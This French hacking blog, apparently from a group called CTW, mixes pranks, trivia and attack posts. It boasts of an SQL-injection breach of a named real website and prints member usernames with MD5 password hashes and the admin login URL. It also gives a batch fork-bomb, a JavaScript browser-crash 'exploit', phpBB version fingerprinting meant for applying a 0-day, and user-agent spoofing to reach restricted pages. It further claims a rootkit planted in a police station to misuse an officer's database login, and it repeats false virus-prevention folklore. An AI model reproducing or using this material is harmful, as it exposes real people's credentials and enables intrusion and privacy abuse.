CTW

2010 = 1+2-(3-4-5)*6*7*8-9

pas mal non ?

salut à tous.

Pour éviter d'embêter vos contacts avec un virus qui attaquerait via votre boite de dialogue, ajoutez cette adresse email:

aaaaaaa@aaa.aaa.

Car un virus attaque d'abord la première lettre de vos contacts, donc ici ce sera cette adresse. Si attaque il y a vous l'entendrez et ou le verrez, donc vous pourrez stopper celle-ci et ainsi éviter de contaminer vos contacts.

à la prochaine pour d'autres de mes travaux (2 en construction pour le moment)

bien à vous.

On peut lire partout, et notamment sur la version française de Facebook, que le poke signifie «attirer l'attention d'un personne en lui tapottant sur l'épaule».. pourtant la significationde «poker» peut s'avérer dans certains cas bien plus explicite que ça...

Effectivement, la version française du poke a largement été édulcorée ! Si l'on fait des recherches sur des sites de traduction anglais-français, on apprend que le verbe to poke est en fait très vulgaire et signifie «fourrer» sexuellement !! :) A partir d'aujourd'hui, vous réfléchirez à 2 fois avant de poker quelqu'un !!

Ceci dit, le sens le plus commun est bien entendu celui qui se réfère à la tape amicale. Mais pour certains flirt, il n'est pas de mauvais augure d'aller "poker" votre cible, ce qui lui montrera tout l'intérêt que lui portez ;)

auteur: Sintron

Lire la suite

je viens de faire une petite trouvaille assez stupéfiante

start
start
start
start
start
start
start

hack.bat

enregistrez ce code sur Notepad, nommez le hack.bat, mnt cliquez dessus et ça ouvrira 200 command je l'ai testé sur xp et windows 7, donc logiquement ça marche sur toutes les versions de windows.

on peut faire une boucle pour que ça ouvre à l'infini le cmd par exemple:

:starting
start cmd
goto starting

mais le hic c'est que je ne comprends pas trop le sens logique du code citez au début :/ juste avec un seul start suffit pour faire bugger le système:

start
hack.bat

j'ai piraté le site http://www.agrifoodskills.net.au

• ricktu: 4b117e26ba0fd7e082474e4890a85452
• jane: 4b117e26ba0fd7e082474e4890a85452
• justin: 4b117e26ba0fd7e082474e4890a85452
• kateb: 4b117e26ba0fd7e082474e4890a85452
• wendyskelton: 4b117e26ba0fd7e082474e4890a85452
• peter: 4b117e26ba0fd7e082474e4890a85452
• Eddie Hardman: 4b117e26ba0fd7e082474e4890a85452
• mjackson: 4b117e26ba0fd7e082474e4890a85452
• vikki: 4b117e26ba0fd7e082474e4890a85452
• Kim Windsor: 4b117e26ba0fd7e082474e4890a85452
• peter.clack: 4b117e26ba0fd7e082474e4890a85452
• jenny wardrop: 4b117e26ba0fd7e082474e4890a85452
• jeb: 4b117e26ba0fd7e082474e4890a85452
• john.test: 4b117e26ba0fd7e082474e4890a85452
• lily: 4b117e26ba0fd7e082474e4890a85452
• roger: 4b117e26ba0fd7e082474e4890a85452
• blank: 4b117e26ba0fd7e082474e4890a85452
• nswfitc: 4b117e26ba0fd7e082474e4890a85452
• ChemCertNSW: 4b117e26ba0fd7e082474e4890a85452
• belindaw-aas: 4b117e26ba0fd7e082474e4890a85452
• kalmiron: 4b117e26ba0fd7e082474e4890a85452
• Dos: 4b117e26ba0fd7e082474e4890a85452
• vandeep: 4b117e26ba0fd7e082474e4890a85452
• blankMichelle2006-04: 4b117e26ba0fd7e082474e4890a85452
• blankCoralie2006-04-: 4b117e26ba0fd7e082474e4890a85452
• barbmc: 4b117e26ba0fd7e082474e4890a85452
• blankShelley2006-04-: 4b117e26ba0fd7e082474e4890a85452
• guest: 4b117e26ba0fd7e082474e4890a85452
• ian linley: 4b117e26ba0fd7e082474e4890a85452
• dammika: c9e3b222e9b4c5edfe2933f70a047d6a
• rmiddleton: 6a80e309f1922a25cb00ebcbabc017ae
• Candice: e4c1a5aaf59f7204ca1e411d8bf060bd
• bayleyd: 2430e5d313f49f9560d2b88027e9fd1b
• petzwithpizazz: aae039d6aa239cfc121357a825210fa3
• David: 464e07afc9e46359fb480839150595c5
• blankJohn2006-05-19: 8e15625d6c158ec48f374efb77bd2714
• Amity: 73553277ad41760463310bd5b26f7d81
• blankMIke2006-05-22: 8e15625d6c158ec48f374efb77bd2714
• blankBrett2006-05-24: 8e15625d6c158ec48f374efb77bd2714
• blanklorna2006-06-09: 8e15625d6c158ec48f374efb77bd2714
• lorna: 618d8173cac7382b2afa596bb91aff8f

toute la liste des membres du projet AGRIFOOD

en bas de la page allez sur "Administration" pour entrer les login, voici le lien direct pour l'autenthification admin http://www.agrifoodskills.net.au/admin/

Type : Injection SQL. Les mot de passes sont en md5, décryptez les: ici

une formule mathématique permet de déterminer le jour le plus déprimant de l'année... - pour 2006, ce jour est le lundi 23 janvier.

la formule est 1/8 M+(D-p) 3/8xTA NxBA, avec :

• M : météo
• D : dettes
• p : paie perçue en janvier
• T : période écoulée depuis Noël
• A : période écoulée depuis l’abandon des bonnes résolutions
• N : niveau de motivation
• BA : besoin d’agir

# Question?

Tout d'abord qu'est-ce qu'un stealer ? Un stealer est un outil qui permet le vol de mot de passe sauvegardé, exemple, le vol de compte steam ou de mot de pass messenger. Et tout les mot de passe sauvegardé dans firefox.

Que veut dire reversing ? Cette technique permet de tracer le pirate qui vous infecte, on parle de reverse lorsque on cherche la trace du pirate ou bien simplement lorsque on essaye de retrouver des sources dans un exe, ce sont deux techniques complètement différente. Nous allons nous intéresser à notre technique, c'est à dire retrouver la trace de l'attaquant.

Quels sont les outils nécessaires ?

• - Sun Xvm VirtualBox. } Site officiel: http://www.virtualbox.org
• - WireShark. } Site officiel: http://www.wireshark.org/
• - Un navigateur web. (ici Firefox: http://www.mozilla-europe.org)
• - Une copie de windows. (Format iso ou cd)

# Installation !

Je ne vais pas créer un tutoriel qui décrit l'installation de la virtualbox. Vous pourrez en trouver plusieurs sur le net.

Installez la virtual box, puis dans la virtual box installez Filezilla cela va permettre un échange d'information entre la machine et la VM. Pour cela crée un compte ftp sur: http://drivehq.com. Configurez filezilla. (Tuto trouvable sur le net) ensuite installez Filezilla sur votre pc. Et installez WIRESHARK en dehors de la vm c'est à dire dans votre xp habituel. Cette technique va permettre entre autre de bypass le "Anti_Wireshark". bcp de stealers ont l'option "anti wireshark"

# Recherche !

Donc ouvrez votre virtualbox et lancez windowsxp, puis grâce à votre navigateur web visitez par exemple: Youtube ou Dailymotion pour trouver des fichier infecté, le plus simple c'est de rechercher les fichier qui sont surement infecté par_exemple: iStealer V3.(Vuln_Stealer). Pour trouver un fichier infecté sur la toile c'est complètement simple lorsque vous voyez un outil nommé par ex: Steam Hack.exe c'est surement un outil qui ne fonctionne pas et qui est surement infecté.

1. Vérification !

Cette étape permet l'apprentissage des différentes techniques utilisée par les hacker pour qu'on ne puisse les tracer, exemple le "Anti_Wireshark" : si vous avez Wireshark d'ouvert dans votre machine virtuelle le stealer ne va jamais s'ouvrir, si vous fermez wireshark il s'ouvre aussitôt, ou bien la technique du "Anti_Virtualbox" si les hackers actives cette technique nous ne pouvons pas les tracers. Mais heureusement qu'il y'a plusieurs contournements, comme je l'ai proposé, il suffit de mettre Wireshark en dehors de la VM pour qu'on bypass l'anti_Wireshark. Donc après avoir trouvé un fichier infecté, on va pouvoir l'analyser, on ouvre WIRESHARK, puis regardez attentivement les données sortantes, double cliquez sur le fichier, si vous voyez une connexion à un ftp, c'est que le stealer est bien actif et il a bien envoyé les données au server distant, mais comme ce pirate n'est pas très malin vous avez dû voir des lignes qui ressemblent a ceci: Encadré en rouge: Server FTP, USER, PASS

Vous pourrez trouver le login ainsi que le mot de passe du ftp du pirate. Supprimez ou utilisez ses données, faites ce que bon vous semble. c'est parce qu'il n'a pas crypté ses connexions et on voit tout en clair ;)

Bonjour à tous, je vais vous expliquer comment avoir la version d'un forum PhpBB.

Sur ce forum par exemple: http://www.onlinetri.com/phpBB2/ , on ne voit que "Powered by phpBB © 2001, 2005 phpBB Group"

Donc pour connaître la version , écrivez après l'url du forum: docs/CHANGELOG.html

http://www.onlinetri.com/phpBB2/docs/CHANGELOG.html

pourquoi connaitre la version d'un forum?? pour pouvoir appliquer un 0-day dessus.

Je viens de décrouvrir en bidouillant avec mes entete HTTP et en modifiant mon user-agent une astuce très sympathique

Cette méthode consiste à vous connectez en tant que Bot (Google, MSN...) sur la Toile, ça peut-être pratique pour beaucoup de chose, si l'on a pas accès a des forums et que l'on a la flemme de s'inscrire, ou par exmple, un topic est interdit pour les membres mais les bots on droit d'y accéder, ou pour se connecter sans être vu, ou vous pouvez même l'essayer sur là clàsse C, le rectorat et la zone maitre!! han mais nan, j'ai protégé ces zones ^^

Tout d'abord, il faut avoir Mozilla Forefox comme navigateur, si vous ne l'avez pas téléchargez le! ensuite téléchargez l'add-on User Agent Switcher

bien, maintenant allez à cette adresse: http://techpatterns.com/downloads/firefox/useragentswitcher.xml et faites "Fichiers", "Enregistrer-sous" maintenant vous avez la source de plusieurs Bots ;)

Enfin allez dans "Outils" (toujours sur notre navigateur Mozilla ) ==> "Default User Agent" ==> "Edit User Agents..." ==> "Import..." (donc là, vous importez la page source que vous avez enregistré). Désormais retournez dans "Outils" puis sélectionnez le Bot "Googlebot 2.1 (New version)" allez sur un forum quelconque & BINGO ! vous êtes connecté en tant que GoogleBot Angel

c'est un code que j'ai créé qui fait une boucle pour l'ajout d'un site au marque-page.

<html> <title>Denial of Service Exploit //</Title> <body> <script>alert('You want to crash Firefox? :]')</script> <script type="text/javascript"> function crash() { title="CTW"; url="http://www.ctw-community.tk"; if (window.sidebar) { window.sidebar.addPanel(title, url,""); } else if( window.external ) { window.external.AddFavorite( url, title); } else if(window.opera && window.print) { return true; } } for (lol=0;lol<lol+1;lol++) crash(); </script> </body> </html>

Ceci est un truc de Zeus (c'est comme ça que j'appelle ça ^^). Bon, quand j'étais jeune, (aujourd'hui j'ai 20 ans et toutes mes dents xD ) j'avais fais mon stage dans un poste de police.

Je faisais le con qui ne savais rien en informatique, je devais jouer ce rôle !! Mon instituteur, était un flic, il s'appelle Frank, chouette son prenom ça fait genre flic de new york, je l'aimais bien, il est cool ce type :) dans son bureau il m'avait expliquer comment fonctionnait les empreintes digitales, utiliser la poudre et faire les testes et patati patata... mais ce qui m'a le plus choqué c'est qu'il m'a montré un logiciel dont j'ignorais l'existence !!! il m'a dis "comment tu t'appelle ?" je lui ai donné mon nom complet et là qu'est ce que je vois ??

toutes les informations sur ma vie !!

je lui ai dis si je pouvais faire un teste, alors j'ai tapé le nom de ma copine, et waw !! j'étais bouche bée, on voyais tous les nom de sa famille, son numero de tel fixe et mobile, sa sécurité sociale, son age, taille, sa photo, son adresse, l'immatriculation de sa voiture, etc....

donc, si un flic cherche un criminel anonyme il tappe juste l'immatriculation de sa voiture pour avoir son identité complete, ou si comme indice il n'a qu'un numéro de tel, il le tape et il saura à qui il appartient.

Je n'ai pas ce logiciel sur moi, mais je peux l'utiliser!

J'ai essayé de comprendre le fonctionnement de ce programme ! 1- Je m'étais dis qu'il doit être introuvable sur le net (et effectivement j'ai cherché au peigne fin toute la toile et je n'ai rien trouvé ! meme pas des type qui en parle dans un fofo ou dans un article...)

2- imaginons que j'arrivais à l'avoir ! Ce programme pour avoir toutes ces infos doit communiquer avec la préfecture de police et récupérer les données dans la base de données. même si je l'installe sur mon ordi, il ne peut fonctionner :/

L'ordi sur lequel j'avais fais le teste avec frank était un OS Windows donc.. ce prog s'installe sur les windows mais ne peut etre utiliser à partir d'un ordinateur quelconque mais uniquement ceux qui ont l'accès !!

3- Pour utiliser ce logiciel il faut un code, chaque flic à un code personnel écrit sur son badge pour pouvoir se logguer sur ce logiciel.

J'ai fais mon stage là bas et j'ai beaucoup appris ! :)

Quand frank a tapé son code, il l'a fait devant moi! Donc je le connais! J'avais piraté le poste de police a cette époque, j'avais utilisé un ptit rootkit tres perfectionné que j'ai bien planqué sur le poste de la brigade de stup, Ce rootkit est 100% FUD jusqu'à aujourd'hui, j'avais fais le teste sur tous les antivirus et je me suis bien appliqué à ce que ça soit bien anonyme. j'ai mis ce même rootkit dans mon école!

donc, je me logue sur mon serveur étranger (chinois) que j'avais hacké y'a bien longtemps via google pour accéder à la machine du poste de police. j'ai le code de frank donc j'utilise ce logiciel mais tant que Frank excerce son métier, et tant que la machine distante est allumée!

On peut dire que si tu as ce logiciel tu es Dieu :)

Ce programme dont je parle s'appelle cheops! personne n'en parle d'ailleurs :s

Ce programme national de police est pire que ce que Kevin Mitnik voulait à l'époque pour l'espionnage téléphonique (programme SAS Carnivore)

La police utilise beaucoup cheops dans leurs enquêtes! Y'a un autre logiciel qui s'appelle "PROXIMA" A quoi sert t-il ? Ce programme proxima permet d'informer les flics de toutes les méthodes qu'utilises les bandits, genre les arnaques dans les distributeurs de billets de banque: la caméra, le faux clavier, la fausse couche pour insérer la carte cb, etc... c'est très détaillé !!

Sinon j'ai un pote à moi qui a sa propre boite d'opérateur telephonique, il vend ses communications aux entreprises et aux autres opérateurs.. lui il m'a expliquer comment localiser une personne qui a son téléphone allumé, grâce aux bornes, pour faire un système de triangulation.

si une voiture, un scooter, ou autre est volé, ils l'enregistrent sur cheops et c'est par la suite d'une vérification de l'immatricule de l'objet qu'ils sauront si cet objet est volé ou pas!

voili voilou c'est ma source ce ptit cheops !!!

Regardez ce document de la de la sécurité intérieure et des libertés locales sur cheops pour l'installation/utilisation/configuration: ici

On le retrouve bien entendu dans la partie maitre de la CTW!!

Vous souhaitez avoir l’air intelligent ? Voici quelques conseils pour y parvenir.

Cet article peut vous intéresser dans deux cas :

1. Vous êtes un abruti de première, et vous voulez vous la jouer en paraissant être génial

2. Vous êtes un génie, mais vous manquez d’aisance relationnelle et de charisme, et vous êtes souvent pris pour un abruti de première

Certains naïfs s’imaginent que pour paraître intelligent, il suffit de l’être. Rien n’est moins vrai, malheureusement. Les gens se font une première opinion sur l’intelligence d’une personne au premier coup d’oeil. C’est à dire, en se basant quasiment essentiellement sur l’apparence.

Partant de là, il est courant que l’intelligence d’une personne soit sous-/sur-évaluée. Du coup, il est beaucoup plus facile de paraître intelligent plutôt que de l’être. Voici quelques conseils.

* Soyez beau, grand et mince : C’est malheureux, mais c’est comme ça. Si vous êtes beau, grand et mince, vous serez spontanément évalué comme plus intelligent que quelqu’un de moins gâté par la nature. Ensuite, sur ce point, c’est la loterie, et on ne peut pas y faire grand chose.

* Habillez vous classe : Ah ! Ça, tout le monde peut le faire. Si vous avez l’habitude de ne porter que très peu d’attention à vos vêtements, peut-être est-il temps de renouveler votre garde robe ?

Laissez donc tomber vos vieux t-shirts sans âge et tout tâchés. Oubliez un peu les pantalons de jogging. Faites un petit effort pour paraître élégant. Les gens bien habillés paraissent plus malins que les ploucs.

* Portez des lunettes : Les gens associent souvent les lunettes à un QI élevé.

* Parlez vite et fort : Un signe d’intelligence qui permet d’en imposer. Lorsque vous parlez, tâchez d’avoir un débit régulier et assez rapide. Et parlez haut (mais n’en abusez pas).

* Exprimez vous correctement : Lorsque vous parlez, utilisez un vocabulaire varié, avec si possible des mots compliqués, qui font trés “intelligents”. Des mots comme “paradigme”, “conjoncture” ou “épistcopal”.

Votre débit doit être régulier, et articulez clairement. Bannissez les “heu…”, “hem”, les hésitations, les blancs, et les mots d’argot. Tout ceci demande quand même pas mal d’entraînement.

* Interrompez les autres : C’est peut-être un peu grossier, mais quoi qu’il en soit, les gens qui interrompent souvent les autres passent pour plus malins.

* Choisissez avec soin vos sujets de conversation : car certains font plus intelligent que d’autres. Parmi les sujets de premier choix, on trouve la littérature, la politique, et le droit. Bannissez la météo, le foot, et les ragots, qui donnent plutôt une impression de médiocrité intellectuelle.

* Riez franchement : des études ont montré que les rires francs étaient plus appréciés que les rires dans sa barbe, les rires contenus et autres bruits de gorge. Alors, si vous voulez vous esclaffer, faites le à gorge déployée.

* Travaillez vos postures : Ayez une attitude sûre de vous, tenez vous droit et décontracté. Vous aurez l’air plus malin que si vous êtes avachi. Et regardez les gens dans les yeux. Un regard fuyant ne fait pas intelligent.

Si vous suivez tous ces conseils, et avec un peu d’entraînement, vous ne devriez pas avoir top de mal à vous faire passer pour plus intelligent que vous ne l’êtes. Sympa, non ?

Ceci est un blog de la CTW, où j'écris tous mes travaux.